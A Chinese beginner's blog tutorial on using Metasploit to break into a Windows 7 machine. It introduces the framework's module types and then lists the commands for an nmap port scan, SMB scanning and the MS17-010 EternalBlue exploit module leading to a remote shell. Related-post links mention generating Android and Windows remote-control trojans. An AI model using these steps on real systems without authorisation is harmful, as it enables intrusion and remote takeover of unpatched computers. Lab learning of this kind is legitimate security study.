Metasploit入侵win7
文章目录
- 一、Metasploit是什么?
- 1、Auxiliaries(辅助模块)
- 2、Exploit(渗透攻击模块)
- 3、payload(攻击载荷模块)
- 4、Post(后期渗透模块)
- 5、Encoder(编码工具模块)
- 二、Metasploit入侵步骤
- 1.准备
- 2.扫描端口
- 1、直接在metasploit框架里使用nmap扫描端口
- 3、查看版本
- 4、查找对应利用漏洞模块
- 5、shell
一、Metasploit是什么?
这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行)
Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板。Metasploit可向后端模块提供多种用来控制测试的接口。Metasploit还有第三方接口,如nmap、SQLMap,可以直接在控制台使用。
1、Auxiliaries(辅助模块)
该模块主要作用是扫描、嗅探、指纹识别辅佐渗透。
2、Exploit(渗透攻击模块)
该模块里面包含许多类型模块,渗透测试者利用这些模块多漏洞进行利用
3、payload(攻击载荷模块)
该模块用于渗透攻击成功之后,在目标系统执行任意命令或者执行特点代码,总结来说就是建立目标机与攻击机稳定连接,可返回shell或进行注入
4、Post(后期渗透模块)
该模块主要用于在获取目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击。
5、Encoder(编码工具模块)
该工具在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来
。
二、Metasploit入侵步骤
1.准备
1、首先你要确定两台主机在同一网段,并且能够ping通,这些我就不做演示了
2、更新软件
apt-get update
apt-get upgrade
3、msfconsole
:打开metasploit
2.扫描端口
1、直接在metasploit框架里使用nmap扫描端口
你们也可以使用模块进行扫描
nmap -p 1-65535 -Pn 192.168.0.1
3、查看版本
1、search scanner/smb/smb_
2、
use 7 -->show options -->set rhosts 192.168.0.1 -->run
4、查找对应利用漏洞模块
1、search exploit/windows/smb/
2、use exploit/windows/smb/ms17_010_eternalblue-->set rhost靶机ip-->set lhost 攻击机ip
我不知道你们这里的payload是不是主动配置的或者加上去的,我这由于以前玩过,不太清楚,如果不是或有问题请告知。
3、这里我们就成功了
5、shell
到了这一步就随便你们怎么玩了!
shell --> chcp 65001
注:如果我这里讲的有哪里不太详细、遗漏或错误,请及时告知。Thanks♪(・ω・)ノ!
Metasploit入侵win7相关推荐
- Metasploit入侵win7系统
Metasploit入侵win7系统 一:实验环境 二:获得信息 a.获得网络拓扑图 b.获得主机ip和目标ip 三:实施入侵 a.打开控制终端 b.查找漏洞 c.进行配置 四:对主机进行操作 五:做 ...
- kali入侵win7(转载)
前言: 本文的目的并不是教会学者入侵win7主机, 而是被入侵之后怎么反制并且做好下一步的防范 以及查到攻击者的蛛丝马迹 攻击原理: 利用未修复永恒之蓝的445端口漏洞入侵目标主机 演示设备: 主机 ...
- kali linux入侵安卓7.0,【教程】metasploit入侵安卓手机
metasploit入侵安卓手机拿shell KALI IP: 192.168.194.128 1.生成木马文件 msfvenom -p android/meterpreter/reverse_tcp ...
- kali利用MSF对ms17_010漏洞入侵win7
步骤一:实验环境的搭建 攻击机:kali(2021.1版本) 靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安 ...
- Metasploit攻击win7实例(上)
一.实验目的 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试.攻击. 二.实验环境 图1 实验拓扑图 ...
- 渗透测试-Kali入侵Win7主机
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 本文目的:演示如何借助Kali Linux系统的Metasploit渗透测试框架生成远程控制木马,然后感染局域网内的 Win 7主机,从而 ...
- Metasploit攻击win7实例——利用MS11_003 IE漏洞攻击win7主机
攻击流程 环境配置: 漏洞主机:win7,IP地址:10.1.1.129 攻击主机:Kali linux,IP地址:10.1.1.128 使用工具: Nessus+metasploit 利用Nessu ...
- 记一次MSF永恒之蓝入侵win7系统实验
目录 1.环境搭建 2.实验开始 1# 保证两个主机之间可以ping通 2# kali打开msfconsole 3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010) 4# 获取目 ...
- ms17_010 入侵Win7
一.win7镜像的下载 二.进入msfconsole ┌──(root㉿kali-2002)-[~] └─# msfconsole 等待一会儿,出现 msf6> 即为进入成功 三.查找漏洞 ...
最新文章
- 知名公司薪水(转帖)2007
- setitimer()函数
- 2019 Multi-University Training Contest 1 - 1001 - Blank - dp
- stm32倒计时秒表proteus_单片机课程设计倒计时秒表教程文件
- mysql 长轮询_基于HTTP长轮询实现简单推送
- linux 2.6内核进程调度,Linux2.6内核进程调度系列--scheduler_tick()函数2.更新实时进程的时间片,...
- PhotoshopCS5中将单位修改成百分比
- 集成学习-蒸汽量预测案例
- 第九次作业(杨辉三角)
- ENVI软件App Store插件工具的下载、安装与使用方法
- QTTabBar 使用教程:用浏览器的方式管理 Windows 资源管理器
- Codeforces Round #306 (Div. 2)
- 彩色星球科技旗下娱乐元宇宙产品“彩色世界”正式上线;GIGABYTE推出新一代AORUS专业电竞笔电 | 全球TMT...
- C语言实现数字全排列
- python基础:面向对象的应用--搬家具。
- 程序员副业赚钱之道,实现月收入增加20K
- keil编译后报错Error:L6218E的解决方法
- 服务器内存UDIMM与RDIMM区别
- 游戏打的菜?当然是延迟的锅啦~
- LVM挂盘的详细操作
热门文章
- 让分子在PPT里“动”起来
- Scanner 的用法
- Windows Virtual PC如何瘦身~
- Matlab 基础01 - 多维数组的排列转换和Permute 函数
- 简单的图片上传和下载
- 解决 libstdc++.so.6: version ‘GLIBCXX_3.4.30‘ not found 问题
- uniapp商品详情页规格、SKU选择
- PDK和工艺文件解读
- Java使用百度AI实现识别图片文字信息、身份证信息
- iphone win7无法识别_win7系统中iTools无法识别苹果设备的解决方法